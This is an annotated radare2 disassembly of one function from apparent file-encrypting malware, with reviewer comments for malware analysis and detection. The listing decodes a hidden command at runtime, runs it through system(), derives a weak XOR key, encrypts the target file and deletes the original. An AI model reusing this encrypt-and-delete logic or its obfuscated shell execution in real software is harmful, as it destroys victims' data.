; Reviewer summary of the radare2 listing below (x86-64, Intel syntax; rdi = first argument):
;   In:  rdi = path of the target file (kept in r14, later handed to remove()).
;   1. Rebuilds a 28-byte encoded blob plus a NUL terminator on the stack and passes it to
;      func.homemade.decode_buffer; the returned pointer is used as a format string.
;   2. __sprintf_chk() formats that string with the path into a 0x80-byte stack buffer,
;      and the result is executed with system().
;   3. Multiplies four (arc4random() + 1) results into one 64-bit value and stores it next
;      to the path pointer: { path @ local_b0h, value @ local_a8h }. Presumably this is the
;      XOR key (going by the function names) -- confirm in encrypt_file_with_XOR.
;   4. Passes a pointer to that pair to func.homemade.encrypt_file_with_XOR, then remove()s
;      the original path.
;   Return values of system(), the encrypt routine and remove() are not checked here.
;   This function itself keeps the value only in its own stack frame; whether the callee
;   stores or sends it elsewhere cannot be told from this listing.
;   Analysis notes: the command string exists only after runtime decoding, so a static
;   strings scan will not show it; the system() call should appear as a shell child
;   process in process-creation telemetry.
- ┌ (fcn) func.homemade.pick_random_key 268
- │ func.homemade.pick_random_key ();
- │ ; var int local_d0h @ rbp-0xd0
- │ ; var int local_c0h @ rbp-0xc0
- │ ; var int local_b8h @ rbp-0xb8
- │ ; var int local_b4h @ rbp-0xb4
- │ ; var int local_b0h @ rbp-0xb0
- │ ; var int local_a8h @ rbp-0xa8
- │ ; var int local_28h @ rbp-0x28
- │ ; CALL XREF from 0x100001768 (entry0)
- │ ; CALL XREF from 0x1000016e1 (entry0)
- │ 0x100002050 55 push rbp ; frame-pointer prologue
- │ 0x100002051 4889e5 mov rbp, rsp
- │ 0x100002054 4157 push r15 ; save the callee-saved registers used below
- │ 0x100002056 4156 push r14
- │ 0x100002058 4154 push r12
- │ 0x10000205a 53 push rbx
- │ 0x10000205b 4881ecb00000. sub rsp, 0xb0 ; reserve 0xb0 bytes of locals
- │ 0x100002062 4989fe mov r14, rdi ; r14 = path argument, must survive the calls below
- │ 0x100002065 488b05940f00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0
- │ 0x10000206c 488b00 mov rax, qword [rax] ; rax = current stack canary value
- │ 0x10000206f 488945d8 mov qword [local_28h], rax ; canary stored above the locals, checked before ret
- │ 0x100002073 0f2805060f00. movaps xmm0, xmmword [fcn.100002f80] ; [0x100002f80:16]=-1 ; "-\xd9\xec\x941\x96\xb9\xda:\xc2\xb9\xc5i\x87\xaf\xc7j\x83\xad\xc5i\x82\xad\xc6j\x87\xa1\xc6l\x85\xa9\xc4\x01"
- │ 0x10000207a 0f298530ffff. movaps xmmword [local_d0h], xmm0 ; encoded blob bytes 0..15 (constant data at 0x100002f80, not a function)
- │ 0x100002081 48b86f86aec6. movabs rax, 0xd7ab8769c6ae866f
- │ 0x10000208b 48898540ffff. mov qword [local_c0h], rax ; encoded blob bytes 16..23 (immediate)
- │ 0x100002092 c78548ffffff. mov dword [local_b8h], 0xd0ea937e ; encoded blob bytes 24..27 (immediate)
- │ 0x10000209c c6854cffffff. mov byte [local_b4h], 0 ; NUL terminator after the 28 encoded bytes
- │ 0x1000020a3 488dbd30ffff. lea rdi, [local_d0h] ; rdi = start of the encoded blob
- │ 0x1000020aa e881feffff call func.homemade.decode_buffer ; returns a pointer in rax (decoding scheme not shown here)
- │ 0x1000020af 4889c1 mov rcx, rax ; rcx = decoded string, used as the format (4th argument)
- │ 0x1000020b2 488d9d50ffff. lea rbx, [local_b0h] ; rbx = output buffer at rbp-0xb0
- │ 0x1000020b9 be00000000 mov esi, 0 ; int flag = 0 (2nd argument of __sprintf_chk)
- │ 0x1000020be ba80000000 mov edx, 0x80 ; size_t slen = 0x80, declared size of the output buffer
- │ 0x1000020c3 31c0 xor eax, eax ; al = 0: no vector registers used by this variadic call
- │ 0x1000020c5 4889df mov rdi, rbx ; char *s
- │ 0x1000020c8 4d89f0 mov r8, r14 ; first variadic argument = path
- │ 0x1000020cb e856070000 call sym.imp.__sprintf_chk ; __sprintf_chk(s, flag, slen, format, ...); the checked variant aborts instead of writing past slen
- │ 0x1000020d0 4889df mov rdi, rbx ; const char * string
- │ 0x1000020d3 e826080000 call sym.imp.system ; int system(const char *string) ; runs the formatted command through the shell; result ignored
- │ 0x1000020d8 4c89b550ffff. mov qword [local_b0h], r14 ; reuse the start of the command buffer: local_b0h = path pointer
- │ 0x1000020df e854070000 call sym.imp.arc4random ; uint32_t arc4random(void) (the tool's "int rand(void)" label was wrong)
- │ 0x1000020e4 4189c7 mov r15d, eax
- │ 0x1000020e7 41ffc7 inc r15d ; factor 1 = result + 1 (wraps to 0 when the result is 0xffffffff)
- │ 0x1000020ea e849070000 call sym.imp.arc4random ; uint32_t arc4random(void)
- │ 0x1000020ef 4189c4 mov r12d, eax
- │ 0x1000020f2 41ffc4 inc r12d ; factor 2 = result + 1
- │ 0x1000020f5 e83e070000 call sym.imp.arc4random ; uint32_t arc4random(void)
- │ 0x1000020fa 89c3 mov ebx, eax
- │ 0x1000020fc ffc3 inc ebx ; factor 3 = result + 1
- │ 0x1000020fe e835070000 call sym.imp.arc4random ; uint32_t arc4random(void)
- │ 0x100002103 ffc0 inc eax ; factor 4 = result + 1
- │ 0x100002105 4963cf movsxd rcx, r15d ; factors are sign-extended, i.e. treated as signed 32-bit values
- │ 0x100002108 4963d4 movsxd rdx, r12d
- │ 0x10000210b 480fafd1 imul rdx, rcx ; rdx = factor1 * factor2
- │ 0x10000210f 4863cb movsxd rcx, ebx
- │ 0x100002112 4898 cdqe ; sign-extend factor 4 (eax) into rax
- │ 0x100002114 480fafc1 imul rax, rcx ; rax = factor4 * factor3
- │ 0x100002118 480fafc2 imul rax, rdx ; rax = product of all four, truncated to 64 bits; not uniform (odd only if all four factors are odd, 0 if any factor is 0)
- │ 0x10000211c 48898558ffff. mov qword [local_a8h], rax ; stored directly after the path pointer
- │ 0x100002123 488dbd50ffff. lea rdi, [local_b0h] ; rdi = &{ path pointer, 64-bit value }
- │ 0x10000212a e831000000 call func.homemade.encrypt_file_with_XOR ; result ignored
- │ 0x10000212f 4c89f7 mov rdi, r14 ; const char * filename
- │ 0x100002132 e89d070000 call sym.imp.remove ; int remove(const char *filename) ; deletes the original path; result ignored
- │ 0x100002137 488b05c20e00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0
- │ 0x10000213e 488b00 mov rax, qword [rax]
- │ 0x100002141 483b45d8 cmp rax, qword [local_28h] ; compare the saved canary with the live value
- │ ┌─< 0x100002145 7510 jne 0x100002157 ; mismatch -> __stack_chk_fail
- │ │ 0x100002147 4881c4b00000. add rsp, 0xb0 ; release locals
- │ │ 0x10000214e 5b pop rbx ; restore callee-saved registers in reverse push order
- │ │ 0x10000214f 415c pop r12
- │ │ 0x100002151 415e pop r14
- │ │ 0x100002153 415f pop r15
- │ │ 0x100002155 5d pop rbp
- │ │ 0x100002156 c3 ret
- └ └─> 0x100002157 e8d0060000 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)